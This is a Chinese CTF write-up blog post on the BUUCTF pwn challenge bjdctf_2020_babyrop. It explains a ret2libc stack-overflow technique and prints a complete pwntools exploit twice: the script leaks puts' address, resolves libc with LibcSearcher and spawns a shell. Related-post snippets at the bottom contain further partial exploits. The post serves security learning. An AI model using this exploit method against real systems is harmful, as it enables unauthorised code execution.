BUUCTF bjdctf_2020_babyrop

已于 2022-10-27 10:17:26 修改
阅读量766 收藏
点赞数 1
分类专栏: Pwn 文章标签: 学习 python
于 2022-10-27 10:12:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29912475/article/details/127546473
版权

首先checksec

打开IDA Pro看一眼

 

 

 

 

ret2libc的做法。

gdb动态调试查看需要覆盖的数量

 

 

 ROPgadget找pop rdi

 构造第一部分Payload,泄露地址

from pwn import * 
from LibcSearcher import LibcSearcher #导入模块 LibcSearcher,不是老的那个 https://github.com/dev2ero/LibcSearcher
 
elf = ELF("/root/Desktop/Pwn Subject/bjdctf_2020_babyrop")
io = process("/root/Desktop/Pwn Subject/bjdctf_2020_babyrop")

puts_plt = elf.plt['puts'] # 从plt表中获取put的plt地址
puts_got = elf.got['puts'] # 从got表中获取put的got地址
io.recvuntil(b"story!\n")
rdi = 0x400733 # ROPgadget获取的地址,用来平衡栈帧
start = 0x400530 # IDA Pro 中可以查看,_start 函数的地址

payload = ( b'A' * 40 + p64(rdi) + p64(puts_got) + p64(puts_plt) + p64(start) )
io.sendline(payload)
puts_addr = u64(io.recv(6).ljust(8,b'\x00')) # ljust,前6个字节有效,\x00为人为补全8字节(没理解)
print("puts real addr : ",hex(puts_addr)) # puts 的真实地址,用来传参 LibcSearcher 搜索 Libc版本
libc = LibcSearcher('puts',puts_addr) # 使用 LibcSearcher工具搜索 puts 的真实地址
libcbase = puts_addr - libc.dump('puts') # 使用 puts 的真实地址,在 Libc 中dump puts 自己(其实就是把puts作为基址)
system = libcbase + libc.dump('system') # 使用上一步获取的基址,dump并计算出 system 的真实地址
str_bin_sh = libcbase + libc.dump('str_bin_sh') # 使用之前获取的基址,dump并计算出 /bin/sh 字符串的真实地址
print("System Address: ",hex(system)) # 打印地址,就是为了好看
print("String /bin/sh Address: ",hex(str_bin_sh)) # 打印地址,就是为了好看

至此 system、/bin/sh 的地址就已经拿到了,只需要重新溢出一次程序,使用刚才获取的地址即可。因为没有开PIE,因此地址是固定的。

完整PoC为:

from pwn import *
from LibcSearcher import LibcSearcher
 
elf = ELF("/root/Desktop/Pwn Subject/bjdctf_2020_babyrop")
io = process("/root/Desktop/Pwn Subject/bjdctf_2020_babyrop")

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
io.recvuntil(b"story!\n")
rdi = 0x400733
start = 0x400530

payload = ( b'A' * 40 + p64(rdi) + p64(puts_got) + p64(puts_plt) + p64(start) )
io.sendline(payload)
puts_addr = u64(io.recv(6).ljust(8,b'\x00'))
print("puts real addr : ",hex(puts_addr))
libc = LibcSearcher('puts',puts_addr)
libcbase = puts_addr - libc.dump('puts')
system = libcbase + libc.dump('system')
str_bin_sh = libcbase + libc.dump('str_bin_sh')
print("System Address: ",hex(system))
print("String /bin/sh Address: ",hex(str_bin_sh))

payload2 = ( b'A' * 40 + p64(rdi) + p64(str_bin_sh) + p64(system) )
io.recvuntil(b"story!\n")
io.sendline(payload2)
io.interactive()

使用 1 的 Libc 即可获取shell。

今天终于搞明白 ret2libc3 了,不过不知道为什么所有 包括我自己写的PoC,都不能成功获取 ret2libc3 的shell,因此就去做BUUCTF的题了,边看大佬的解析边做。 

连接靶机试了试,发现靶机得用这个 Libc

 

 

Red-Leaves
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ret2libc3地址泄露--pwn
weixin_44642009的博客
03-17 2676
练习三–ret2libc3地址泄露 在此实验前,我们从简到难实验了ret2libc1,ret2libc2两个实验,对getshell有了一定了解,基本学会了如何在有无system及/bin/sh函数的情况下获取权限,在此以实验二的名为pwn的可执行文件为入手点,进行getshell。 首先,对ret2libc3可执行文件进行检测, checksec ret2libc3 结果如图: 发现其不存...
三个pwn题
weixin_52640415的博客
06-28 1651
shortcut :格式化字符串漏洞写溢出 lucky_guy:alloca负值覆盖ret babynote:libc-2.31禁用exec写 ORW free_hook->sigreturnframe-> setcontex+61->orw
栈溢出总结之基础ROP
weixin_45097188的博客
02-28 558
ret2text 原理:ret2text 即控制程序执行程序本身已有的的代码 (.text)。其实,这种攻击方法是一种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets),这就是我们所要说的 ROP。 这时,我们需要知道对应返回的代码的位置。当然程序也可能会开启某些保护,我们需要想办法去绕过这些保护。 例子 仅开了NX栈不可执行保护...
buuctf ciscn_2019_c_1 wp
yajuanpi4899的博客
01-16 570
目录 一、题目速阅 二、知识要点 三、题解payload 一、题目速阅 拿到题目,进行check └─$ checksec ciscn_2019_c_1 1 ⚙ [*] '/home/kali/Desktop/prac/ciscn_2019_c_1' Arch: amd64-64-little R
bjdctf_2020_babyropBUUCTF
qq_41696518的博客
08-31 313
bjdctf_2020_babyrop
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
2020-HackIM_ctf_hackim-ctfwriteup_
09-28
这是hackim-ctf的writeup
BUUCTF逆向前八题
最新发布
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
BasicASM.s(BUUCTF
06-04
分析过程文件
2020YCBCTF:2020羊城杯官方writeup及
03-24
20202020羊城杯官方writeup及源码 各个过渡的分散的writeup后续会逐步上传,所有转移的writeup已经汇总在wp文件夹下的writeup文件里面了!
pwn ——ret2libc3
qq_41696518的博客
07-06 788
ret2libc3
【CTF】bjdctf_2020_babyrop
凉水的博客
06-18 685
bjdctf_2020_babyrop
[BUUOJ]bjdctf_2020_babyrop
Do1phln的博客
10-24 400
先checksec,64位小端序,MX保护开,其它全关,接着进入IDA分析main函数内很简单,进一步分析后找到关键函数vuln本题没有找到backdoor,所以应该是做基地址泄露然后getshell,整个程序内只有puts函数可以输出内容,因此对puts函数进行修改,先溢出后转到此处,考虑到系统会对堆栈进行平衡,所以我们要修改puts的参数需要先进行一次pop保证堆栈平衡,因此使用ROPgadget先找到符合我们条件的ROPputs_got是puts函数的got表项地址,里面装的是puts的真实地址。使用
BUUCTFbjdctf_2020_babyrop2(write up)
qq_44768749的博客
08-26 909
BUUCTFbjdctf_2020_babyrop20x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 64位程序,开启栈不可执行、canary、部分RELRO保护 0x02 运行 输入两次字符串 0x03 IDA main函数 调用了下面三个函数 init函数 初始化,输出提示 gift函数 存在格式化字符串漏洞 vuln函数 存在栈溢出漏洞 0x04 思路 开启canary保护 可利用gift函数
BUUCTF bjdctf_2020_babyrop 1 和 2
BengDouLove的博客
04-09 1466
这两个rop其实是差不多的,第二个比第一个多了一个canary 先看一下第一个 bjdctf_2020_babyrop1 init里面两个puts vul里面一个puts一个read 没有system和binsh ,要泄露libc,但是现在没有可以控制的输出手段,,所以要通过read,,覆盖返回地址为puts,,构造参数让puts输出libc的函数 这是网上别人的做法,,首先到pop rd...
buuctf pwn bjdctf_2020_babyrop
MrTreebook的博客
05-14 287
buuctf pwn bjdctf_2020_babyrop1.checksec2.IDA分析ropper3.exp 1.checksec 运行一下 2.IDA分析 这里调用了vuln函数 我们接着看一下vuln函数 buf只有32,但是我们可以写64 很明显的溢出 本程序没开PIE 没开canary 再看一下有没有后门函数 没有"/bin/sh" 没有system()函数 那么就要通过泄露函数地址来计算libc的基地址了 64位程序在传参的时候需要用到寄存器 当参数少于7个时, 参数从左到
BUUCTF-Pwn-bjdctf_2020_babyrop
餐桌上的猫
03-25 359
exp from pwn import* from LibcSearcher import * p=process('/home/lhb/桌面/bjdctf_2020_babyrop') elf=ELF('/home/lhb/桌面/bjdctf_2020_babyrop') p=remote('node4.buuoj.cn',27346) main=0x4006ad pop_rdi_ret=0x400733 puts_plt=elf.plt['puts'] puts_got=elf.got['puts']
BUUCTF(pwn)bjdctf_2020_babyrop
半岛铁盒的博客
03-31 422
from pwn import* from LibcSearcher import* p=remote('node3.buuoj.cn',25519) elf=ELF('./2') main=0x4006ad rdi=0x400733 puts_got=elf.got['puts'] puts_plt=elf.plt['puts'] payload='a'*(0x20+8)+p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(main) p.sendl...
bjdctf2020 babyrop
pondzhang的专栏
05-09 292
from pwn import * p = process('./bjdctf_2020_babyrop') libcelf = ELF('./libc-2.23.so') pop_rdi_ret = 0x0000000000400733 pop_rsi_r15_ret = 0x0000000000400731 pltputs = 0x00000000004004E0 main = 0x00000000004006AD gotputs = 0x0000000000601018 payload = 'a' *
buuctf luky_guy
09-28
Luky库是一组抽象复杂操作的Java类,它提供了各种功能,包括网络操作,事件处理,加密,数据库处理,snmp监视,队列,信号量,解析器和XML处理程序等。根据提供的引用内容,无法直接了解到buuctf luky_guy的具体信息。如果您能提供更多关于buuctf luky_guy的背景信息,我可以尝试为您提供更准确的答案。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值